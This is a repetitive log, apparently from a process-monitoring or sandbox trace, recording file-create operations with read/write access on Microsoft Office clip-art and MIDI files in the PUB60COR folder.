Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02748G.GIF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02748U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02749G.GIF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02749U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02750G.GIF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02750U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02752G.GIF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02752U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02753U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02754U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02755U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02756U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02757U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02758U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02845G.GIF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02897J.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03011U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03012U.BMP desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03014_.GIF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03379I.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03380I.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03425I.JPG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PRRT.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PRRTINST.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PSRETRO.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PSSKETLG.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PSSKETSM.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PSWAVY.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\RE00006_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\RECYCLE.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\ROAD_01.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SAFRI_01.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SCHOL_02.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SHOW_01.MID desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00256_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00260_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00268_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00286_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00298_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00308_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00345_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00452_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00712_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL01040_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL01041_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL01394_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL01395_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL01565_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00017_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00018_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00152_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00157_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00159_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00166_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00168_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00170_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00177_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00183_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00190_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00191_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00192_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00194_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00197_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00199_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00200_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00208_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00212_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00221_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00222_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00223_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00257_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00289_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00299_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00305_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00333_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00345_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00350_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00352_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00364_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00367_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00373_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00382_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00390_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00391_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00416_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00423_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00444_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00452_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00453_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00454_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00466_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00476_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00479_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00483_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00486_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00505_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00513_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00555_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00603_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00610_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00629_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00633_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00638_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00656_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00668_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00670_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00671_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00683_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00694_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00704_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00726_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00728_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00732_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00734_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00735_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00736_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00768_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00783_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00820_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00828_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00834_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00837_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00910_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00911_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00913_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00914_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00915_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00916_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00917_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00918_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00935_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00938_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00941_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00942_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00943_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01044_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01063_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01236_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01560_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01561_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01563_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01566_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01568_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01569_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01575_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
Fn
Create C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01777_.WMF desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 3
